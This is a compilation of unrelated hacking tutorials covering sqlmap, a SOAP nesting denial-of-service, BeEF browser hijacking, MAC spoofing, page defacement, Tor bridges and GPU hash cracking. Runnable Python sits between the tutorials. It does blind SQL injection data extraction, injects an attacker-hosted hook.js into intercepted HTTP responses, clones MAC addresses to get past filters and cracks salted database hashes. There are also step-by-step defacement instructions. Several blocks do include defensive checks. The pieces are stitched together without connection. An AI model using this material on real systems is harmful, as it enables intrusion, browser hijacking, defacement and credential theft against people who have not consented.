Step 1: Install Virtualbox

Virtualbox is a free and easy to use virtual machine manager, you could of course use VMware or Parallels but we will use virtualbox.

Select Bridge for your adapter, you could do NAT or Host Only of course just depends on your requirements. By using bridge mode your VM will have an IP address on your local network this makes it easier when you are playing with network based security testing tools. Security testing is fun, just ensure you only test on systems you own / operate or have permission to scan.

Step 2: Ubuntu Installation

Download the latest Ubuntu ISO from http://www.ubuntu.com, select the ISO as the boot media for your guest and start the virtual machine. Choose the install option and Ubuntu will be installed onto the virtual hard disk of the machine.

Step 3: sqlmap Installation

Python is pre-installed on Ubuntu, so all you need to do is download sqlmap from SourceForge, unpack it into a directory and start testing.

Fetch the tarball (with wget, or your browser) from http://sqlmap.sourceforge.net/#download

You can unpack it with a GUI-based tool (double-click on it) or use tar with gzip decompression:

tar zxvf sqlmap-0.9.tar.gz

cd sqlmap

python sqlmap.py

This should be your results when you run the sqlmap.py script from a working installation:

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

Usage: python sqlmap.py [options]

sqlmap.py: error: missing a mandatory parameter ('-d', '-u', '-l', '-r', '-g', '-c', '--wizard' or '--update'), -h for help

The error is merely telling us that we did not supply the parameters needed for a test to take place. Repeat the command with -h to get a full list of options, or see the excellent online help and tutorials on the sqlmap project page.

For a simple test we will use the HTTP GET testing option against a single URL.

python sqlmap.py -u 'http://mytestsite.com/page.php?id=5'

This runs a series of SQL injection tests against that URL, with the parameter (id) being tested for SQL injection.

sqlmap can be used not only to test but also to exploit SQL injection: extracting data from databases, updating tables and even popping shells on remote hosts if all the ducks are in line. All these options and examples are documented on the excellent SourceForge project page. Now that you have a working installation, get over there and start testing.
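What sqlmap actually does with `?id=5` is easier to see in a few dozen lines than in a tool run. The following is an added example, not code from this tutorial or from the sqlmap project: a hand-rolled boolean-based blind probe (the test behind "is the id parameter injectable?") followed by character-by-character extraction (the "extracting data from databases" step). The web page is simulated by a local function over an in-memory SQLite table, constructed here so everything runs offline; the table contents and the `safe_page` contrast are assumptions.

```python
# Added example (not from the original tutorial or from the sqlmap project):
# a hand-rolled boolean-based blind SQL injection probe of the kind sqlmap
# automates when you point it at page.php?id=5.  The "web page" is a local
# function backed by an in-memory SQLite database so it runs offline.
import sqlite3

# Constructed target: one products table, id 5 being the value in the article's URL.
_CONN = sqlite3.connect(":memory:")
_CONN.executescript("""
    CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
    INSERT INTO products VALUES (1, 'anvil'), (5, 'rocket skates'), (7, 'tnt');
""")


def vulnerable_page(id_param: str) -> str:
    """Emulates page.php?id=...: the parameter is concatenated into the SQL."""
    try:
        row = _CONN.execute(
            "SELECT name FROM products WHERE id = " + id_param).fetchone()
    except sqlite3.Error:
        return "<html><body>Database error</body></html>"
    return "<html><body>Product: %s</body></html>" % (row[0] if row else "not found")


def safe_page(id_param: str) -> str:
    """The same page written properly: type check plus a bound parameter."""
    try:
        value = int(id_param)
    except ValueError:
        return "<html><body>Bad request</body></html>"
    row = _CONN.execute(
        "SELECT name FROM products WHERE id = ?", (value,)).fetchone()
    return "<html><body>Product: %s</body></html>" % (row[0] if row else "not found")


def is_boolean_blind_injectable(page, base_value: str) -> bool:
    """Boolean-based blind test on one GET parameter.

    sqlmap's opening move is similar: append a TRUE condition and a FALSE
    condition to the original value and compare both responses with the
    baseline.  Injectable: TRUE looks like the baseline, FALSE does not.
    Not injectable: both probes are treated identically (rejected or ignored).
    """
    baseline = page(base_value)
    true_resp = page(f"{base_value} AND 1=1")
    false_resp = page(f"{base_value} AND 1=2")
    return true_resp == baseline and false_resp != baseline


def blind_extract(page, base_value: str, subquery: str, max_len: int = 64) -> str:
    """Pull the result of `subquery` out one character at a time.

    Each character is found by binary search over its code point (about seven
    TRUE/FALSE requests per character instead of one per candidate).  When
    substr() runs past the end of the string, unicode('') is NULL, every
    comparison is false and the search bottoms out at 0, which ends the loop.
    """
    baseline = page(base_value)

    def holds(condition: str) -> bool:
        return page(f"{base_value} AND ({condition})") == baseline

    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if holds(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    for name, page in (("vulnerable_page", vulnerable_page), ("safe_page", safe_page)):
        print(name, "injectable:", is_boolean_blind_injectable(page, "5"))
    print("extracted:", blind_extract(vulnerable_page, "5",
                                      "SELECT name FROM products WHERE id = 7"))
```

The binary search is the reason blind extraction is practical at all: seven requests per character against a slow remote host is tolerable, 128 is not. sqlmap adds what this sketch leaves out, chiefly response normalisation (stripping timestamps and other noise before comparing pages) and a library of payloads per database back end.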

SQL Injection Detection Tools


– Microsoft Source Code Analyzer – www.microsoft.com

– Microsoft UrlScan – www.microsoft.com

– dotDefender – www.applicure.com

– IBM AppScan – www.ibm.com

– HP WebInspect – www.hp.com

– SQLDict – ntsecurity.nu

– HP Scrawlr – www.hp.com

– Paros – www.darknet.org.uk

– SQL Block Monitor – sql-tools.net

– Acunetix – www.acunetix.com

– GreenSQL – www.greensql.net

– CAT.NET – www.microsoft.com

COERCIVE PARSING ATTACK


Attack description

Coercive Parsing is one of the simplest attacks to mount. It aims at exhausting the system resources of the attacked web service. The attacker simply sends a SOAP message with an unbounded number of opening tags in the SOAP Body; in other words, a very deeply nested XML document.

Tests on Axis2 web services showed that the attack drives CPU usage to 100% for as long as the SOAP message is being processed. If the attacker keeps the socket open, the attack lasts as long as the connection between attacker and victim exists: all the attacker has to do is "pump" opening tags into the socket for as long as he wishes to keep the web service disabled.

This attack is one of the more devastating denial of service attacks, however countermeasures are available.

NOTE: Only web services using a DOM parser are susceptible to this attack. A DOM parser creates an in-memory representation of the SOAP message, and during this process the in-memory size can grow to between 2 and 30 times the size of the message. When very large documents are processed, memory exhaustion is often the result. With a streaming parser such as SAX the attack is very unlikely to succeed, since the entire document is never held in memory.[1]

Attack subtypes

There are no attack subtypes for this attack.

Prerequisites for attack

In order for this attack to work, the attacker has to know the following:

  1. The endpoint of the web service. The WSDL is not required, since the attack targets the XML parser alone; it does not matter whether the operations within the SOAP message are valid.
  2. That the endpoint is reachable from the attacker's location. If the web service is only available to users within a company's internal network, the attack is limited accordingly.

Graphical representation of attack

[Figure: AttackedComponent1.png, attacked web service component]

  • Red = attacked web service component
  • Black = location of attacker
  • Blue = web service component not directly involved in attack.

Attack example

The following SOAP message shows an example with a “Coercive Parsing Attack” payload.

<soapenv:Envelope xmlns:soapenv="..." xmlns:soapenc="...">
<soapenv:Body>
 <x>
    <x>
       <x>  
          <x>
             <x>
                 <!-- Continued for as long as wanted by the attacker -->

Listing 1: “Coercive Parsing Attack” payload.

Attack mitigation / countermeasures

The "Coercive Parsing" attack can be fully stopped by strict schema validation. Each WSDL should contain a detailed description of the elements, attributes and data types used. For example, when only one element <Surname> is expected within the SOAP body, the XML Schema should contain the following:

..
<!-- excerpt fictional XML Schema -->
<xs:element name="Surname" type="xs:string"/>
..

Listing 2: Excerpt of an XML Schema for the tag "Surname"

By using the data type "string", only strings are allowed within the element tags; injecting further tags inside the <Surname> tag is not possible. Since the default minimum and maximum number of occurrences is 1, the element has to appear exactly once in the SOAP body. If no other tags are defined in the XML Schema for the SOAP body, any other tag is prohibited by default too, making it impossible to mount the attack. Any SOAP message that violates this schema is therefore rejected.

 

It is understood that strict schema validation is resource intensive; however, one should be clear about how easy it is to compromise the availability of a web service when schema validation is turned off.
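The NOTE above says streaming parsers are largely immune because they never hold the whole document; the cheap complement to schema validation is therefore a depth limit enforced from the streaming parser's callbacks. The following is an added example, not part of the original article: it builds the Listing 1 payload at an arbitrary nesting depth, then parses it with expat (SAX-style events, no tree) and aborts at the first start tag beyond the limit. The limit of 32 and the SOAP envelope namespace URL are assumptions; a real deployment derives the limit from the deepest legitimate element in its own WSDL.

```python
# Added example (not part of the original article): a streaming, depth-limited
# check that rejects the coercive-parsing payload of Listing 1 long before the
# whole message is read.  Uses expat directly (SAX-style callbacks), so no
# in-memory tree is ever built.  The depth limit of 32 is an assumption; pick
# one that covers your own WSDL's deepest legitimate element.
import xml.parsers.expat

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


class NestingTooDeep(Exception):
    """Raised from inside the start-element callback to abort the parse."""


def coercive_payload(depth: int) -> bytes:
    """Constructed attack message: a SOAP Body holding `depth` nested <x> tags."""
    return (
        f'<soapenv:Envelope xmlns:soapenv="{SOAP_NS}"><soapenv:Body>'
        + "<x>" * depth + "</x>" * depth
        + "</soapenv:Body></soapenv:Envelope>"
    ).encode()


def check_nesting(data: bytes, limit: int = 32):
    """Parse `data` with a streaming parser, tracking element depth.

    Returns (accepted, deepest_depth_seen, bytes_consumed).  On rejection the
    parse stops at the offending start tag, so bytes_consumed shows how little
    of an attack message the server actually had to read.
    """
    parser = xml.parsers.expat.ParserCreate()
    depth = deepest = 0
    consumed = len(data)

    def on_start(name, attrs):
        nonlocal depth, deepest, consumed
        depth += 1
        deepest = max(deepest, depth)
        if depth > limit:
            consumed = parser.CurrentByteIndex   # offset of the tag that broke the limit
            raise NestingTooDeep(f"element depth {depth} exceeds limit {limit}")

    def on_end(name):
        nonlocal depth
        depth -= 1

    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    try:
        parser.Parse(data, True)      # exceptions raised in handlers propagate here
    except NestingTooDeep:
        return False, deepest, consumed
    return True, deepest, consumed


if __name__ == "__main__":
    benign = coercive_payload(3)
    attack = coercive_payload(200_000)
    print("benign :", check_nesting(benign), "of", len(benign), "bytes")
    print("attack :", check_nesting(attack), "of", len(attack), "bytes")
```

Envelope and Body already account for two levels, so a limit of 32 leaves thirty levels for the payload. The same callback is also the place to cap element count and total bytes read, which are the other two resources a coercive-parsing sender can burn.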


How to Hijack Web Browsers Using BeEF


Today we're going to be introducing a new tool for hacking web browsers. Often we will need to exploit a variety of vulnerabilities associated with web browsers. For this sort of exploitation we can use a popular tool named BeEF (Browser Exploitation Framework).

BeEF

How BeEF works is actually fairly easy to understand. BeEF serves a JavaScript file, simply named hook.js. Our job as the attacker is to find a way to run this JavaScript in the victim's browser. Once it has run, we control their browser in various ways. There are multiple ways to execute this script: for example, we could set up a phishing page with the hook inside its HTML, or we could inject it into their traffic using a man-in-the-middle attack. Today we're just going to use the demo page provided by BeEF. So, let's get started!
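Both delivery routes named above come down to getting one script tag into HTML the victim renders. The following is an added example, not part of this article or of BeEF itself: `inject_hook` plants the tag in a page you control (the phishing case), `rewrite_http_response` does it to an intercepted response (the man-in-the-middle case, with Content-Length recomputed), and `find_hooks` is the defender's check for the same thing. The attacker address reuses 10.0.0.19 from this article and the sample response is constructed; both are assumptions.

```python
# Added example (not part of the original article or of BeEF itself): the two
# ways the article says hook.js can reach a victim, as code.  inject_hook()
# plants the hook in HTML you control (a phishing page); rewrite_http_response()
# does the same to an intercepted HTTP response, the man-in-the-middle case.
# The hook URL reuses the attacker address from the article; it is an
# assumption, not something BeEF fixes.  find_hooks() is the defender's view.
import re

HOOK_URL = "http://10.0.0.19:3000/hook.js"   # BeEF serves hook.js on port 3000

_SCRIPT_SRC = re.compile(r'<script\b[^>]*\bsrc=["\']([^"\']*hook\.js)["\']', re.IGNORECASE)


def inject_hook(html: str, hook_url: str = HOOK_URL) -> str:
    """Insert <script src=hook.js> before </head> (so it runs before the
    page's own scripts), else before </body>, else at the very end."""
    tag = f'<script src="{hook_url}"></script>'
    for closer in ("</head>", "</body>"):
        m = re.search(re.escape(closer), html, re.IGNORECASE)
        if m:
            return html[:m.start()] + tag + html[m.start():]
    return html + tag


def rewrite_http_response(raw: bytes, hook_url: str = HOOK_URL) -> bytes:
    """Inject the hook into a raw HTTP/1.x response on the wire.

    Only text/html bodies are touched and Content-Length is recomputed.  A real
    interception proxy would also have to undo gzip/chunked encodings (or strip
    Accept-Encoding from the request first); this example assumes an identity
    body.
    """
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return raw
    headers = head.decode("latin-1").split("\r\n")
    content_type = next((h for h in headers if h.lower().startswith("content-type:")), "")
    if "text/html" not in content_type.lower():
        return raw
    new_body = inject_hook(body.decode("utf-8", "replace"), hook_url).encode("utf-8")
    headers = [h for h in headers if not h.lower().startswith("content-length:")]
    headers.append(f"Content-Length: {len(new_body)}")
    return "\r\n".join(headers).encode("latin-1") + b"\r\n\r\n" + new_body


def find_hooks(html: str) -> list:
    """Defender side: every external script whose path ends in hook.js."""
    return [m.group(1) for m in _SCRIPT_SRC.finditer(html)]


if __name__ == "__main__":
    # Constructed sample response, as an interception proxy would see it.
    response = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                b"Content-Length: 63\r\n\r\n"
                b"<html><head><title>News</title></head><body>Hello</body></html>")
    hooked = rewrite_http_response(response)
    print(hooked.decode())
    print("hooks found:", find_hooks(hooked.split(b"\r\n\r\n", 1)[1].decode()))
```

The MITM variant only works over plain HTTP; with HTTPS the attacker is back to phishing or an XSS on a page the victim already trusts, which is why BeEF is usually paired with a social engineering step rather than a network one.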

Step 1: Start up and Login to BeEF

If we're going to use BeEF, we need to start it! If you're using Kali 2, you can find BeEF on the dock. If you aren't using Kali 2, you can launch BeEF by entering the following command:

service beef-xss start

Now that we’ve started BeEF, we need to login. If we point our web browser at the localhost on port 3000 with the /ui/authentication URI, we will see the BeEF login page (In short: 127.0.0.1:3000/ui/authentication). When we see this page, we need to enter the default credentials in order to use BeEF. The default username and password are both “beef.” Let’s go ahead and log in now:

Alright, now that we’ve entered our credentials and logged in, we can see the first page. Let’s take a look at this page and then we’ll break it down:

Now, to our immediate left we can see a section named “hooked browsers.” This is where BeEF will list all the browsers we currently have under our control. There is only one victim here at the moment, which is ourselves. Now that we’ve logged in and seen the start page, let’s move on to hooking our victim.

Step 2: Hook the Victim

Now that we have BeEF up and running, we need to hook the victim so that we can control their browser. We will be using the BeEF demo page to run the hook, so we move over to the victim's machine and navigate to the demo page. It is served on the attacking system's address, port 3000, under /demos/basic.html. For our demonstration today, we enter 10.0.0.19:3000/demos/basic.html in the victim's browser; let's do that now:

Now that we’ve navigated our victim to the demo page containing the BeEF hook, we should see them appear under the “hooked browsers” section we saw earlier:

There we go! We've successfully hooked our victim's browser. Now that we have some basic control over it, we can do many things that will aid us in compromising this victim.

Step 3: Wreak Havoc

Now that we can control our victim's browser, we're going to demonstrate the kind of things we can do. We're simply going to use some JavaScript to find out what plugins are installed in the browser. First, we need to select our victim and navigate to the "Commands" tab of BeEF's GUI. Let's see what this looks like now:

Now that we’ve navigated to our commands tab, we can look through all of the possible commands we can execute on the victim’s browser. Please note that not all of these will work as some of them are circumstance specific. The one we’re after in this instance is the raw javascript module. We can find this module under the “Misc” folder in the commands tab. Let’s select this module now:

We can see that in this module we have a box to enter some JavaScript. In order to see the plugins that the victim has, our code returns information out of the "navigator" object (navigator.plugins). We're also going to make an alert box appear in the victim's browser, just for fun. Let's take a look at this code now:

Now that we have entered our code to execute, we simply need to press the “execute” button on the bottom right of the BeEF page. Once we do this, we should see the JavaScript return an array containing the currently installed plugins. Let’s execute our code and see the results now:

Here we can see a list of all the plugins that the victim has installed in their browser! We could look deeper and see if there are any exploitable vulnerabilities in these plugins, but that's best discussed later. Now that we have our results, let's move back to the victim and take a look at our alert box!

There we have it! We were not only able to hijack our victim's browser, but we were able to extract information from it that could open a future avenue for attack. As we've demonstrated here today, browser hijacking can be extremely useful to any hacker looking for a way into a system. Not only is it good for finding vulnerabilities, but in some cases we can use it to exploit them as well. That's all for the introduction to hijacking with BeEF. In the next article, we'll take a closer look at social engineering with BeEF, and how we can use it to steal credentials from the user.

HOW TO SPOOF YOUR MAC ADDRESS (ANONYMITY) 2016



A MAC (Media Access Control) address is the number that identifies your network adapter(s) on the local network. To remain truly anonymous you must change your MAC address. By spoofing your MAC address you can:

  • Stay anonymous
  • Bypass MAC filters
  • Pass MAC authentication

#1 Staying Anonymous :

The first and chief reason for spoofing your MAC address is anonymity. Your MAC address can be seen by anyone on your local area network (LAN); moreover, if you are connected to a WiFi network, anyone can see your MAC address simply by running a basic scan from Windows or Linux. A simple example on Linux is the following command, where mon0 is your monitor-mode wireless interface:

airodump-ng mon0

 

The BSSIDs listed refer to the MAC addresses of the various networks within your range, and the stations column shows the client MACs talking to them. By running a simple scan we discover all of them. An attacker who learns your MAC address may try to abuse your network, or use the Internet as "you". That is why you may want to change your MAC address.

#2 Bypassing MAC Filters :

If you ever need to connect to an open WiFi network in order to stay anonymous but things do not turn out well, the WiFi owner may be using a MAC filter. A MAC filter means only clients with specific MAC addresses are allowed to connect. By changing your MAC address to one that is already allowed you can connect to the network, but only after de-authenticating the client that is currently using it.

#3 MAC Authentication :

Some ISPs (Internet Service Providers) only allow you to connect with a specific MAC address. Changing your address always helps in this situation.

HOW TO CHANGE YOUR MAC ADDRESS

1. SMAC (for Windows): an effective MAC changer that has been around for a long time. It is easy to use with any hardware and you do not need to be a specialist to use it. It completely spoofs your MAC address. Besides SMAC there are many other programs you can use to change your computer's MAC address and so stay anonymous on the web.

You can download it by clicking Here

2. macchanger (Linux): macchanger is a freely available tool for changing the MAC address on a Linux machine. All you have to do is select your network interface and run the command, and it is basically done.

The screenshot above was taken on BackTrack, where macchanger is pre-installed; it is also available in many other distributions, for example on Debian/Ubuntu with:

sudo apt-get install macchanger-gtk
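Whichever tool you use, the address you set has to be a valid one or the driver will refuse it or the switch will drop your frames. The following is an added example, not part of this article or of macchanger: it parses and classifies addresses by the two flag bits in the first octet (bit 0, I/G, must be 0 for unicast; bit 1, U/L, marks a locally administered address), generates a random spoof the way `macchanger -r` does, and prints the iproute2 commands that apply a cloned address, which is the MAC-filter bypass from #2. The interface name wlan0 and the sample "allowed client" address are assumptions.

```python
# Added example (not part of the original article or of macchanger): what a
# spoofed MAC has to look like and how to build one.  The first octet carries
# two flag bits: bit 0 (I/G) must be 0 for a unicast address and bit 1 (U/L)
# set to 1 marks the address as locally administered, which is what a
# randomly generated spoof should use.  Interface names are assumptions.
import random
import re

_MAC_RE = re.compile(r"^([0-9a-f]{2})(?:[:-]([0-9a-f]{2})){5}$", re.IGNORECASE)


def parse_mac(mac: str) -> list:
    """'00:11:22:33:44:55' (or dash separated) -> six integers; ValueError otherwise."""
    if not _MAC_RE.match(mac):
        raise ValueError(f"not a MAC address: {mac!r}")
    return [int(part, 16) for part in re.split(r"[:-]", mac)]


def format_mac(octets) -> str:
    return ":".join(f"{b:02x}" for b in octets)


def describe(mac: str) -> dict:
    """Classify the address by its first-octet flag bits."""
    octets = parse_mac(mac)
    return {
        "multicast": bool(octets[0] & 0x01),              # I/G bit
        "locally_administered": bool(octets[0] & 0x02),   # U/L bit
        "oui": format_mac(octets[:3]),   # vendor prefix for globally assigned addresses
    }


def random_mac(rng=random) -> str:
    """Random unicast, locally administered address (what `macchanger -r` produces)."""
    octets = [rng.randrange(256) for _ in range(6)]
    octets[0] = (octets[0] | 0x02) & 0xFE      # set U/L, clear I/G
    return format_mac(octets)


def spoof_commands(iface: str, mac: str) -> list:
    """The Linux commands to apply `mac` to `iface`, the long way (iproute2)
    and with macchanger.  Only valid unicast addresses are accepted."""
    if describe(mac)["multicast"]:
        raise ValueError("a multicast address cannot be assigned to an interface")
    mac = mac.lower()
    return [
        f"ip link set dev {iface} down",
        f"ip link set dev {iface} address {mac}",
        f"ip link set dev {iface} up",
        f"# or, equivalently: macchanger -m {mac} {iface}",
    ]


if __name__ == "__main__":
    allowed_client = "00:11:22:33:44:55"   # constructed: a MAC seen talking to the AP
    print(describe(allowed_client))
    for cmd in spoof_commands("wlan0", allowed_client):
        print(cmd)
    spoof = random_mac()
    print("random:", spoof, describe(spoof))
```

A cloned address keeps the victim's globally assigned OUI on purpose, since the filter is matching the whole address; a random spoof sets the locally administered bit so it cannot collide with a real vendor assignment. Remember that the interface must be down while the address changes, and that a cloned address only works while the legitimate client is off the network.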

Thanks for Reading 🙂

How to deface suspendedpage.cgi


How to deface suspendedpage.cgi: in this article we discuss how to deface the suspendedpage.cgi page. You may have landed on a suspendedpage.cgi page by mistake and ignored it, but it can be defaced. It is very simple; all you have to do is follow the steps given below 🙂
NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSES. WE ARE NOT RESPONSIBLE FOR ANY HARM DONE BY YOU.

The whole trick is to convert your deface page's HTML into a .cgi script and upload it to the /cgi-bin/ or /cgi-sys/ directory, so you need write access to the site's CGI directory already. Just follow the steps 🙂

  • Go HERE and convert your deface.html to a .cgi script 🙂
  • Save it as suspendedpage.cgi
  • Upload it to the /cgi-bin/ or /cgi-sys/ directory 🙂
  • Once it is uploaded, chmod suspendedpage.cgi to 755 so the web server can execute it.
  • Save and see the result 😀
    Example: www.site.com/cgi-sys/suspendedpage.cgi
  • BOOM!! You have DEFACED the suspendedpage.cgi page 😀 😀

So that's it. If you have any doubts feel free to ask 🙂

How to access Tor, even when your country says you can’t


Censorship is nothing new, but as many governments and law enforcement agencies tighten the noose, anti-surveillance solutions need to get creative.

The Tor Project, which runs the anti-surveillance Tor network, is one such organisation.

The non-profit runs a network designed to disguise the original locations of users through traffic and relay points, and is often used by journalists, activists, and those attempting to circumvent censorship.

Nima Fatemi, an independent security researcher and member of the Tor Project, highlighted in a recent blog post how users in countries such as China, Saudi Arabia, and Iran can still try to access the network.

As noted by Motherboard, governments including Saudi Arabia, Bahrain, Iran, Russia, and China often attempt to block the use of virtual private networks (VPNs) in an effort to keep an eye on their citizens' online activities.

However, blocking Tor is a more complicated problem due to the volunteer-run nodes and relays used to reroute traffic and disguise original IP addresses.

According to Fatemi, the Tor Browser normalises the browser's User-Agent so that all users look alike, which defeats spying and fingerprinting attacks. However, Tor is still an open network where anyone can get a list of relay points, and so governments can simply block them.

“They can simply get the list of Tor relays and block them,” Fatemi noted. “This bars millions of people from access to free information, often including those who need it most. We at Tor care about freedom of access to information and strongly oppose censorship.”

As a result, Tor has developed what the organization called Pluggable Transports (PTs). PTs are a type of “bridge” into the Tor network which “make encrypted traffic to Tor look like not-interesting or garbage traffic,” according to the developer.

If users already want to try out this censorship-thwarting tool, they are in luck — as PTs are already included in the Tor Browser.

Tor has provided a step-by-step guide, as shown in the image below:

[Image: zdnet-tor-censorship-bridge.jpg, Tor's bridge configuration guide (source: Tor)]

If you need additional bridges, you can email the project here or visit the BridgeDB website.

 

Tor has hit the spotlight recently after a scandal involving one of the "core" members of the project's development team rocked the very foundations of the organization. Jacob Appelbaum, a 33-year-old developer, stepped down from his position after allegations of sexual misconduct.

While Appelbaum has denied the claim as a “calculated and targeted attack,” an investigation conducted by an external law firm found that “many people inside and outside the Tor Project have reported incidents of being humiliated, intimidated, bullied, and frightened by Jacob,” according to Tor executive director Shari Steele.

As a result of the scandal, the full Tor board has been replaced with new faces including security expert Bruce Schneier, executive director of the Electronic Frontier Foundation (EFF) Cindy Cohn, and Matt Blaze, a computer and information science professor at the University of Pennsylvania.

IGHASHGPU – GPU Based Hash Cracking – SHA1, MD5 & MD4


IGHASHGPU is an efficient and comprehensive command line GPU based hash cracking program that enables you to retrieve SHA1, MD5 and MD4 hashes by utilising ATI and nVidia GPUs.


It even works with salted hashes, making it useful for MS-SQL, Oracle 11g, NTLM passwords and others that use salts.

IGHASHGPU is meant to run on ATI RV7X0 and RV8X0 cards, as well as any nVidia CUDA video card, with speed varying according to the user's GPU. The program also features a '-cpudontcare' switch that tells IGHASHGPU to get the maximum out of the GPU without any particular regard for CPU usage.

At the same time, you can set a temperature threshold for hardware monitoring ('-hm'), so that the program stops working the GPU when it goes over the permitted value (the default is 90 degrees Celsius).

It also lets you set the block size so as to adjust the video response time and reduce any possible lag; if, on the other hand, display lag does not bother you, you can input a higher value (IGHASHGPU supports block sizes between 16 and 23).

Hashes Supported for Cracking

As IGHASHGPU supports salted hashes it’s possible to use it for:

  • Plain MD4, MD5, SHA1.
  • NTLM
  • Domain Cached Credentials
  • Oracle 11g
  • MySQL5
  • MSSQL
  • vBulletin
  • Invision Power Board

 

Supported Cards/Requirements

  • Only currently supported ATI cards are:
    • HD RV7X0
    • RV830/870
    • 4550
    • 4670
    • 4830
    • 4730
    • 4770
    • 4850
    • 4870
    • 4890
    • 5750
    • 5770
    • 5850
    • 5870
  • Catalyst 9.9+ must be installed.
  • Only supported nVidia cards are the ones with CUDA support, i.e. G80+.
  • Systems with multiple GPUs supported.

Usage:

ighashgpu.exe [switch:param] [hashfile.txt]

-c             csdepa Charset definition (caps, smalls (default), digits, special, space, all)
-u             [chars] User-defined characters
-uh            [HEX] User-defined characters in HEX (2 chars each)
-uhh           [HEX] User-defined characters in Unicode HEX (4 chars each)
-uf            [filename] Load characters from file. Not used with Unicode.
-sf            [password] Password to start attack from
-m             [mask] Password mask
-ms            [symbol] Mask symbol
-salt          [hex] Append salt after password
-asalt         [string] Append salt in ASCII after password
-usalt         [string] Append salt in Unicode after password
-ulsalt        [string] Same as above, but the Unicode string is first transformed to lower case
-min           [value] Minimum length (default == 4), must be >= 4
-max           [value] Maximum length (default == 6), must be <= 31 (not counting salt length)
-h             [hash] Hash to attack (16 or 20 bytes in HEX)
-t             [type] Type of hash to attack
-devicemask:[N] Bit mask for GPU usage, bit 0 == first GPU (default 0xFF, i.e. all GPUs)
-cpudontcare   Tell ighashgpu that you want the maximum from the GPU and don't care about CPU usage at all (this means one CPU core at 100% per GPU)
-hm            [N] Set threshold temperature for hardware monitoring, default is 90C. You can disable monitoring by setting this value to zero.
-blocksize     [N] Set block size; by default N = 23, which means 2^23 = 8388608 passwords offloaded to the GPU in a single batch.

By default the charset is processed as ANSI (i.e. WideCharToMultiByte(CP_ACP, ...)). You can change this with:

-unicode       Use Unicode
-oem           Use OEM encoding
-codepage      [page] Convert charset to a specific codepage (which must be installed on the system, of course)

You can download IGHASHGPU here:

ighashgpu_v0.80.16.1.zip
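The hash list above and the -salt/-asalt/-m switches make more sense once you see how the salted formats are built, because "append salt after password" means something different for each scheme. The following is an added example, not code from this article or from IGHASHGPU: CPU reference implementations of three of the listed formats (MySQL5, vBulletin, MSSQL 2005), a mask expander standing in for -m, and a brute-force loop. The mask syntax (?d, ?l, ?u placeholders) is borrowed from hashcat and is an assumption, not IGHASHGPU's own; the hashes, salts and wordlist are constructed.

```python
# Added example (not from the original article or from IGHASHGPU): how the
# salted formats in the list above are actually built, and the kind of
# candidate generation a -m mask drives, in plain Python.  The mask syntax
# here (?d digit, ?l lowercase, ?u uppercase, literal otherwise) is an
# assumption borrowed from hashcat, not IGHASHGPU's own; the hashes and
# salts are constructed.
import hashlib
import itertools
import string


def mysql5(password: str) -> str:
    """MySQL 4.1+ PASSWORD(): '*' + SHA1(SHA1(pw)) in upper-case hex (no salt)."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def vbulletin(password: str, salt: str) -> str:
    """vBulletin (pre-3.8.5): md5(md5(pw) + salt).  The salt is appended after
    the hex of the inner hash, which is what IGHASHGPU's -asalt option models."""
    inner = hashlib.md5(password.encode("utf-8")).hexdigest()
    return hashlib.md5((inner + salt).encode("utf-8")).hexdigest()


def mssql2005(password: str, salt: bytes) -> str:
    """SQL Server 2005: 0x0100 || salt(4 bytes) || SHA1(UTF-16LE(pw) || salt).
    Note the password is hashed in UTF-16LE, the -unicode case above."""
    digest = hashlib.sha1(password.encode("utf-16-le") + salt).hexdigest()
    return "0100" + salt.hex() + digest


_MASK_SETS = {"?d": string.digits, "?l": string.ascii_lowercase, "?u": string.ascii_uppercase}


def mask_candidates(mask: str):
    """Expand 'pass?d?d' into pass00 .. pass99 (the -m idea: fixed characters
    stay fixed, each placeholder ranges over its charset)."""
    slots = []
    i = 0
    while i < len(mask):
        token = mask[i:i + 2]
        if token in _MASK_SETS:
            slots.append(_MASK_SETS[token])
            i += 2
        else:
            slots.append(mask[i])
            i += 1
    for combo in itertools.product(*slots):
        yield "".join(combo)


def crack(target: str, candidates, hash_fn):
    """Return the first candidate whose hash equals target, or None.
    hash_fn closes over the salt, because the salt is known to the attacker."""
    target = target.lower()
    for word in candidates:
        if hash_fn(word).lower() == target:
            return word
    return None


if __name__ == "__main__":
    wordlist = ["anvil", "rocket", "Password1", "hunter2"]    # constructed
    print(crack(mysql5("hunter2"), wordlist, mysql5))
    salt = "Xy7"
    print(crack(vbulletin("rocket", salt), wordlist, lambda w: vbulletin(w, salt)))
    sql_salt = b"\x01\x02\x03\x04"
    print(crack(mssql2005("pass42", sql_salt), mask_candidates("pass?d?d"),
                lambda w: mssql2005(w, sql_salt)))
```

Two things the code makes concrete: a per-user salt does not slow down cracking one hash at all (the salt is right there in the stored value), it only prevents one candidate hash from being checked against every user at once; and the reason a GPU helps is that every candidate in the loop is independent, so the same `hash_fn` runs on thousands of them in parallel.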
